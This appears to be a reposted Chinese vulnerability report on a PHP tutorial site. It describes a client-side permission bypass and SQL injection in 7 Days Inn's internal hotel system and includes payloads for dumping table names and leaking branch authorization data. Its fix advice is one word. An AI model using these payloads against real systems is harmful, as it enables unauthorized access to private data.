网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

7天连锁酒店内部系统之主系统权限限制下的SQL注

来源:自学PHP网    时间:2015-04-15 15:00 作者: 阅读:

[导读] 为进入前台房店系统奠定了坚实基础http: inner 7daysinn cn FindHotel Default aspx内部系统某些功能通过把按钮禁用来限制权限这种方式形同虚设,通过浏览器把disabled参数删除即可使用。接下来...

为进入前台房店系统奠定了坚实基础
 
http://inner.7daysinn.cn/FindHotel/Default.aspx 
 
内部系统某些功能通过把按钮禁用来限制权限
 
这种方式形同虚设,通过浏览器把disabled参数删除即可使用。
 
接下来也是暴表、字段了,这里略过
 
' and (select top 50 table_name+',' from information_schema.tables where table_schema='inner' for xml path(''))>0 and ''='
 
 
接下来就是另一处,使用 ' or '%'='泄露所有分店电脑授权信息
 

 
还有其它点,请自己寻找,谢谢!
修复方案:
过滤

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论